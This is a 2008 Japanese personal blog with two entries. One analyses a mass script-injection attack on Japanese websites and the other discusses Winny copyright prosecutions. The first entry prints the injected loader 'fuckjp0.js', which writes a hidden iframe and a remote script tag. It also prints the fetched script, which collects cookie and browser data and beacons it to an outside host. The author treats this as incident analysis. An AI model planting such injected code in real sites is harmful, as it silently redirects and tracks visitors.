たぬきん貧乏日記 〜No Worry, No Hurry. Eat Curry!〜


この似顔絵は「似顔絵イラストメーカー(http://illustmaker.abi-station.com/)」で作成しました。せきゅもみ
2003 | 12 |
2004 | 01 | 02 | 03 | 04 | 05 | 06 | 07 | 08 | 09 | 10 | 11 | 12 |
2005 | 01 | 02 | 03 | 04 | 05 | 06 | 07 | 08 | 09 | 10 | 11 | 12 |
2006 | 01 | 02 | 03 | 04 | 05 | 06 | 07 | 08 | 09 | 10 | 11 | 12 |
2007 | 01 | 02 | 03 | 04 | 05 | 06 | 07 | 08 | 09 | 10 | 11 | 12 |
2008 | 01 | 02 | 03 | 05 | 06 | 07 | 08 | 10 | 12 |
2009 | 01 | 02 | 03 | 04 | 05 | 06 | 07 | 08 | 09 | 10 | 11 | 12 |
2010 | 01 | 02 | 03 | 05 | 06 | 07 | 08 | 09 | 10 | 11 | 12 |
2011 | 01 | 02 | 03 | 05 | 06 | 07 | 09 | 10 | 11 | 12 |
2012 | 01 | 02 | 03 | 04 | 05 |

サブアカウントで違うこともやっています。http://d.hatena.ne.jp/TRY_DTM_FREE/

ご注意

ここに書いてあることは個人的なメモや感想・妄想なので一切の保証はいたしません。
しかも内容の正確さや公平さも保証しません。書きなぐりにするので読む人によっては不快感を持つ可能性もあります。
そのうえ更新することも保証しないという好き勝手なスペースです。覚悟してご利用ください。

本でました。
表紙イメージ



さいきんいろんなキーワードで検索してくる方がおられますが、ほぼ完全にハズレだと思います。ごめんなさい。
一縷の望みをかけて、上の検索窓から探してみてください。knoppix でデータ救出ネタは存在します。

中韓あたりからの攻撃が観測されています。アドレスブロックを確認して弾いておきましょう。
こちらも参考になります。


Visual Studio 2010 Express Editions ダウンロードへのリンク
Visual Studio 2008 Express Editions ダウンロードへのリンク
Visual Studio 2005 Express Editions ダウンロードへのリンク


2008年03月25日(Tuesday)

 

[][] 中国からの攻撃?

 

 注意:みだりに URLアクセスしにいかないこと。

 

 LAC のアナウンスをもとにググってみた。

 埋め込まれるスクリプトタグのソースに含まれるドメイン名をググル先生に食わせてみた結果

 

 fuckjp0.js っつう愉快なファイル名のスクリプトの中身

document.writeln("<iframe width=\'10\' height=\'1\' src=\'http:\/\/www.hanjapass.com\/sian\/intro\/jp\/jp.htm\'><\/iframe>");

document.writeln("<SCRIPT language=JavaScript src=\"http:\/\/s16.cnzz.com\/stat.php?id=808572&web_id=808572\" charset=gb2312><\/SCRIPT>");

 

 この中の「http://www.hanjapass.com/sian/intro/jp/jp.htm」は文字化けで読めず。手元で見られるエンコードで試したけど全部だめだった。US-ACIIだと主張しているけどなんか違う。ローカルに保存してバイナリエディタで開いてみたけど,BODY部に何かヘッダが入っている様子もなく。

 もう一つの「http://s16.cnzz.com/stat.php?id=808572&web_id=808572」は中身が見られた。

var expireDate=new Date();var hours=expireDate.getHours();var minutes=expireDate.getMinutes();var seconds=expireDate.getSeconds();var now=expireDate.getTime();
function getCookieVal_cnzz (offset){var endstr = document.cookie.indexOf(";",offset);if(endstr==-1){endstr=document.cookie.length;}return unescape(document.cookie.substring(offset,endstr));}
function GetCookie_cnzz(name){var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;
while(i< clen){
var j=i+alen;
if(document.cookie.substring(i,j)==arg)
return getCookieVal_cnzz(j);
i=document.cookie.indexOf(" ",i) + 1;
if(i==0)break;}
return null;}
var agt=navigator.userAgent.toLowerCase();
data='&agt='+escape(agt)+'&r='+escape(document.referrer)+ '&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage) + '&OS=' + escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.56175700 1206424701';
cnzz_a=GetCookie_cnzz("cnzz02");
if(cnzz_a!=null){cnzz_a=parseInt(cnzz_a);cnzz_a=cnzz_a+1;}else{cnzz_a=0;}
data=data+'&repeatip='+cnzz_a;rtime=GetCookie_cnzz("rtime");ltime=GetCookie_cnzz("ltime");cnzz_eid=GetCookie_cnzz("cnzz_eid");
if(cnzz_eid == null){cnzz_eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;}
if(ltime< 1000000){rtime=0;ltime=0;}else{rtime=parseInt(rtime);}
if(rtime< 1) rtime=0;
ltime=parseInt(ltime);
now=parseInt(now);
if(((now-ltime)>43200*1000)&&(ltime>0))
rtime=rtime+1 ;
data=data+'&rtime='+rtime+'&cnzz_eid='+escape(cnzz_eid);
data=data+'&showp='+escape(screen.width+'x'+screen.height) ;
document.write('<a href="http://www.cnzz.com/stat/website.php?web_id=808572" target=_blank title="ユセウ、ヘウシニ">ユセウ、ヘウシニ</a>');
document.write('<img src="http://s16.cnzz.com/stat.htm?id=808572'+ data +'" border="0" width="0" height="0">');
var lefttime=1000*(86400-hours*3600-minutes*60-seconds);expireDate.setTime(expireDate.getTime() + 500*86400);document.cookie="cnzz02="+cnzz_a+"; expires="+expireDate.toGMTString()+ "; path=/";
var lefttime=1000*86400*182;expireDate.setTime(now + lefttime);document.cookie="rtime="+rtime+";expires="+expireDate.toGMTString()+ ";path=/";document.cookie="ltime="+now+";expires=" + expireDate.toGMTString()+ ";path=/";document.cookie="cnzz_eid="+escape(cnzz_eid)+ ";expires="+expireDate.toGMTString()+";path=/";

 

 fuckjp.js ってパターンもあって,そっちからは「http://www.2117966.com/cuteqq.htm」にリンクしようとするんだけど,これも死んでるみたい。

 昨日からのじゃなくて,もっと前の痕跡しか見つからないみたいだねえ。

 ちなみにウチの鯖には痕跡がない。そもそもデータベースと連携するような WEB コンテンツ置いてないとか ASP なんか使ってないってのもあるけど,ログにも残っていないし。単なるツールでポンの無差別じゃなくて,あらかじめ通じそうなところかどうか調べてから撃ってるのかな。だとしたらちょっと面倒かもしれんなあ。ツールでポンの単純なお子様が相手って訳じゃないとなると,それなりに考えて動く必要がある。

 

 忙しいのでまたあとで。とりあえずはうろたんだーラジオ見てまったりしようぜ。

 

[][] やっとここまできたのね

 

 Winnyによる公衆送信権侵害、2人を書類送検

 

 どういうことかっていうと,Winny を使うとキャッシュ勝手アップロードされるわけよね。つまり,その時点で著作権保護されたものが混じってたらアウトになる。

 中継でもアウト。意図的にやってたら当然アウト。ダウンロードしただけのつもりでもキャッシュ残るからアウト。

 こうなりたくないなら,自分がアップロードしているものを管理できるファイル共有ソフトで,やばいものをアップしないようにコントロールしながら使う必要がある。

 ところが,Winny はそういうアップロード(中継)コンテンツのコントロールができない構造になっている。つまり,構造的にヤヴァい。だから,Winny は使い物にならない。

 Share も同じ。

 

 単体のファイルなら確かにキーしか持っていないのかどうかわからないけど,複数のキーを見られたらどうだろうね。持っているファイルの(それなりに高い精度の)リストは得られるはず。Winny や Share を使いつづけていると,いつそうやって権利者団体にクロールされて吊るされるか解らない。

 そろそろ Winny とか Share とかやめたらどうよ。割に合わないよ?

 

 絶賛宣伝中なので一言。うろたんだーラジオはタダで見れるぜ。ひまつぶしにどぞ。

 



----------------------------他力本願堂本舗---------------------------
Mailto:tarikihongandou@gmail.com
Mailto:tarikihongandou@hotmail.com
PGP Public Key: http://www.tariki.mydns.jp/PGP_Public_Key.txt

似顔絵は「似顔絵イラストメーカー」で作成しました。